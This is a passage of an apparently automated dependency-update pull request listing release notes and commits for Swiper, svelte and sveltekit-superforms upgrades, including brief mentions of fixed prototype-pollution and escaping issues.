count in onResize when virtual mode is enabled (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8163\"\u003e#8163\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/44000834d05ac339a9c4dfbaaa3f60c1a0631cff\"\u003e4400083\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003egrid:\u003c/strong\u003e round down \u003ccode\u003eslidesPerView\u003c/code\u003e before calculating number of slides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8172\"\u003e#8172\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/49a55ab2c89c63679cdd21d389ec7ef9d9d375f4\"\u003e49a55ab\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eelement:\u003c/strong\u003e add navigation button slots (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/cc8224177d5f577b672e37b9386f7388d71ba3c3\"\u003ecc82241\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.1.0...v12.1.1\"\u003e12.1.1\u003c/a\u003e (2026-02-13)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ea11y:\u003c/strong\u003e fix focus in virtual mode enabled (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/30550088fd089600aec2d7f8924b88cff13abbe9\"\u003e3055008\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8147\"\u003e#8147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e avoid double-subtracting offsets in centerInsufficientSlides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8158\"\u003e#8158\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/60b005222a801029a4a00d319517028afba7af18\"\u003e60b0052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e prevent duplicate module initialization in constructor (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8155\"\u003e#8155\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8156\"\u003e#8156\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/07738a233b70535c36126c5b579f2bb40049da6c\"\u003e07738a2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e support boolean as a11y value (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8157\"\u003e#8157\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/6bf76d573196c61db1328350c11e2c44f5d3ec08\"\u003e6bf76d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.0.3...v12.1.0\"\u003e12.1.0\u003c/a\u003e (2026-01-28)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eautoplay:\u003c/strong\u003e broken custom delay percentages with pause/resume (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8133\"\u003e#8133\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0afecde9781268a60a92f752ea3a3a92420e2dcf\"\u003e0afecde\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Don't use \u003ccode\u003edata-swiper-slide-index\u003c/code\u003e for \u003ccode\u003erealIndex\u003c/code\u003e when virtual module is enabled (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8142\"\u003e#8142\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/bd957f8396f711b83dc1bc6b3d42a59e6d6539d2\"\u003ebd957f8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Escape all CSS selector special characters (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/d35f41a85bd1793de58358d06300440e09187a6d\"\u003ed35f41a\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8135\"\u003e#8135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support slidesOffsetBefore and slidesOffsetAfert in cssMode (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/45b98d02b2235b0c425f8bd60ebdc04d7b1a4fbd\"\u003e45b98d0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/7926\"\u003e#7926\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix lazy preloader removal error in react in vue (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/332f5c77005921c8a260f199cdfe6d3aa5d209a1\"\u003e332f5c7\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8149\"\u003e#8149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ethumbs:\u003c/strong\u003e update slide classes on virtual swiper update (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8141\"\u003e#8141\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/975277111b73f389043cb0ed19feee0244a80f57\"\u003e9752771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e Add \u003ccode\u003eautoScroll\u003c/code\u003e to \u003ccode\u003ethumbs.update\u003c/code\u003e type signature (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8146\"\u003e#8146\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/5d91e6edb4ce35d70019616b51f1e380feb9a082\"\u003e5d91e6e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ezoom:\u003c/strong\u003e initialize gesture state after programmatic zoom (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8112\"\u003e#8112\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/71e9511802c34482bc8b66abda19a1a518d88d36\"\u003e71e9511\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ekeyboard:\u003c/strong\u003e add support for custom speed parameter in keyboard navigation (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8148\"\u003e#8148\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/7a4a0e5fc3c85710a37ab021328e083fc3b14e16\"\u003e7a4a0e5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003enew snapToSlideEdge parameter (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/de3131fbf72cccbf1d1473f787ddf15c74612584\"\u003ede3131f\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8021\"\u003e#8021\u003c/a\u003e \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/4780\"\u003e#4780\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.0.2...v12.0.3\"\u003e12.0.3\u003c/a\u003e (2025-10-21)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eelement:\u003c/strong\u003e fixed reference to nav arrows SVG (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0b17ecf56bf941e4a5da2a2c171d5e16a9e4552b\"\u003e0b17ecf\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8115\"\u003e#8115\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e add 'getRotateFix' export to effect utils (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/c97ae5d0069cf3d5c745efb63ced9924a64d2453\"\u003ec97ae5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8114\"\u003e#8114\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/2fd88b718b6854e8d6be7f183e68b73b68dae816\"\u003e\u003ccode\u003e2fd88b7\u003c/code\u003e\u003c/a\u003e 12.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/d3e663322a13043ca63aaba235d8cf3900e0c8cf\"\u003e\u003ccode\u003ed3e6633\u003c/code\u003e\u003c/a\u003e fix prototype pollution bypass in extend() util\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/70c48c16f99affa29236ac13b16a37f43da38ae0\"\u003e\u003ccode\u003e70c48c1\u003c/code\u003e\u003c/a\u003e 12.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/30550088fd089600aec2d7f8924b88cff13abbe9\"\u003e\u003ccode\u003e3055008\u003c/code\u003e\u003c/a\u003e fix(a11y): fix focus in virtual mode enabled\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/60b005222a801029a4a00d319517028afba7af18\"\u003e\u003ccode\u003e60b0052\u003c/code\u003e\u003c/a\u003e fix(core): avoid double-subtracting offsets in centerInsufficientSlides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8158\"\u003e#8158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/6bf76d573196c61db1328350c11e2c44f5d3ec08\"\u003e\u003ccode\u003e6bf76d5\u003c/code\u003e\u003c/a\u003e fix(types): support boolean as a11y value (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8157\"\u003e#8157\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/07738a233b70535c36126c5b579f2bb40049da6c\"\u003e\u003ccode\u003e07738a2\u003c/code\u003e\u003c/a\u003e fix(core): prevent duplicate module initialization in constructor (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8155\"\u003e#8155\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8\"\u003e#8\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/3a1777aa7aefe168eac330f308cedd8c3f4a81e4\"\u003e\u003ccode\u003e3a1777a\u003c/code\u003e\u003c/a\u003e 12.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/3bc6cfe55421053864f6f53494841959748f332a\"\u003e\u003ccode\u003e3bc6cfe\u003c/code\u003e\u003c/a\u003e 12.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/45b98d02b2235b0c425f8bd60ebdc04d7b1a4fbd\"\u003e\u003ccode\u003e45b98d0\u003c/code\u003e\u003c/a\u003e fix(core): support slidesOffsetBefore and slidesOffsetAfert in cssMode\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v11.1.0...v12.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.12 to 5.53.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.53.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: escape \u003ccode\u003einnerText\u003c/code\u003e and \u003ccode\u003etextContent\u003c/code\u003e bindings of \u003ccode\u003econtenteditable\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0df5abcae223058ceb95491470372065fb87951d\"\u003e\u003ccode\u003e0df5abcae223058ceb95491470372065fb87951d\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: sanitize \u003ccode\u003etransformError\u003c/code\u003e values prior to embedding in HTML comments (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0298e979371bb583855c9810db79a70a551d22b9\"\u003e\u003ccode\u003e0298e979371bb583855c9810db79a70a551d22b9\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: set server context after async transformError (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17799\"\u003e#17799\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: hydrate if blocks correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17784\"\u003e#17784\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: handle default parameters scope leaks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17788\"\u003e#17788\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent flushed effects from running again (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17787\"\u003e#17787\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: render \u003ccode\u003e:catch\u003c/code\u003e of \u003ccode\u003e#await\u003c/code\u003e block with correct key (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17769\"\u003e#17769\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: pin aria-query@5.3.1 (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17772\"\u003e#17772\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make string coercion consistent to \u003ccode\u003etoString\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17774\"\u003e#17774\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: update expressions on server deriveds (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17767\"\u003e#17767\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: further obfuscate \u003ccode\u003enode:crypto\u003c/code\u003e import from overzealous static analysis (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17763\"\u003e#17763\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: handle shadowed function names correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17753\"\u003e#17753\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efeat: allow comments in tags (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17671\"\u003e#17671\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efeat: allow error boundaries to work on the server (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17672\"\u003e#17672\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: use TrustedHTML to test for customizable \u003c!-- raw HTML omitted --\u003e support, where necessary (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17743\"\u003e#17743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.53.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: escape \u003ccode\u003einnerText\u003c/code\u003e and \u003ccode\u003etextContent\u003c/code\u003e bindings of \u003ccode\u003econtenteditable\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0df5abcae223058ceb95491470372065fb87951d\"\u003e\u003ccode\u003e0df5abcae223058ceb95491470372065fb87951d\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: sanitize \u003ccode\u003etransformError\u003c/code\u003e values prior to embedding in HTML comments (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0298e979371bb583855c9810db79a70a551d22b9\"\u003e\u003ccode\u003e0298e979371bb583855c9810db79a70a551d22b9\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: set server context after async transformError (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17799\"\u003e#17799\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: hydrate if blocks correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17784\"\u003e#17784\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: handle default parameters scope leaks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17788\"\u003e#17788\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent flushed effects from running again (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17787\"\u003e#17787\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: render \u003ccode\u003e:catch\u003c/code\u003e of \u003ccode\u003e#await\u003c/code\u003e block with correct key (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17769\"\u003e#17769\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: pin aria-query@5.3.1 (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17772\"\u003e#17772\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make string coercion consistent to \u003ccode\u003etoString\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17774\"\u003e#17774\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: update expressions on server deriveds (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17767\"\u003e#17767\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: further obfuscate \u003ccode\u003enode:crypto\u003c/code\u003e import from overzealous static analysis (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17763\"\u003e#17763\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: handle shadowed function names correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17753\"\u003e#17753\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: allow comments in tags (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17671\"\u003e#17671\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ed14b499d6ea6821b5e8f81a723164eb8198dfa9\"\u003e\u003ccode\u003eed14b49\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17802\"\u003e#17802\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0df5abcae223058ceb95491470372065fb87951d\"\u003e\u003ccode\u003e0df5abc\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0298e979371bb583855c9810db79a70a551d22b9\"\u003e\u003ccode\u003e0298e97\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/96fd3ce763525ce6276520ca605dba5ece74ae93\"\u003e\u003ccode\u003e96fd3ce\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17786\"\u003e#17786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/1b3e6605190ab8ca21292ddd3ccf2a71387d79fe\"\u003e\u003ccode\u003e1b3e660\u003c/code\u003e\u003c/a\u003e fix: prevent flushed effects from running again (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17787\"\u003e#17787\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/673a1ab9643644fe31beda33eacfdec9ee1f2668\"\u003e\u003ccode\u003e673a1ab\u003c/code\u003e\u003c/a\u003e fix: set server context after async transformError (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17799\"\u003e#17799\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/3a289797bd205182e7677f58daf472caf537afc2\"\u003e\u003ccode\u003e3a28979\u003c/code\u003e\u003c/a\u003e fix: handle default parameters scope leaks (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17788\"\u003e#17788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/fcdc0289db5e6b0f7cf68cd3988450dad567392f\"\u003e\u003ccode\u003efcdc028\u003c/code\u003e\u003c/a\u003e fix: hydrate if blocks correctly (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17784\"\u003e#17784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/97f3ac557158dd7754264dfe735ed83c2ce95e1f\"\u003e\u003ccode\u003e97f3ac5\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17775\"\u003e#17775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/7deedc5bb4fd6d0f033d00fa9741c7141fffd730\"\u003e\u003ccode\u003e7deedc5\u003c/code\u003e\u003c/a\u003e fix: render \u003ccode\u003e:catch\u003c/code\u003e of \u003ccode\u003e#await\u003c/code\u003e block with correct key (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17769\"\u003e#17769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.53.5/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sveltekit-superforms` from 1.13.4 to 2.27.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/releases\"\u003esveltekit-superforms's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.27.4\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed prototype pollution when using \u003ccode\u003edataType: 'json'\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.27.2\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDevalue version bumped to avoid \u003ca href=\"https://github.com/sveltejs/devalue/security/advisories/GHSA-vj54-72f3-p5jv\"\u003eprototype pollution\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 tests working.\u003c/li\u003e\n\u003cli\u003eZod 4 adapter didn't use the correct JSON Schema format for dates.\u003c/li\u003e\n\u003cli\u003eNested data traversal for correcting invalid types didn't stop at a valid value, replacing paths with default data further down the tree.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.27.1\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed client validation issue with rapid multiple blur events.\u003c/li\u003e\n\u003cli\u003eArktype adapter improved.\u003c/li\u003e\n\u003cli\u003eUnion schemas now works with default values, replacing invalid properties even if nested.\u003c/li\u003e\n\u003cli\u003eWhen using the \u003ccode\u003e{ taint: 'untaint-form' }\u003c/code\u003e option, form wasn't untainted unless it was modified.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.27.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ca href=\"https://arktype.io/\"\u003eArktype\u003c/a\u003e adapter is finally a \u0026quot;full\u0026quot; adapter, meaning it's retrospectable and doesn't require default values anymore!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSuperDebug rune version is back, can now be imported as \u003ccode\u003eimport SuperDebug from 'sveltekit-superforms/SuperDebug.svelte';\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFixed \u003ccode\u003ebigint\u003c/code\u003e handling for Zod 4 and 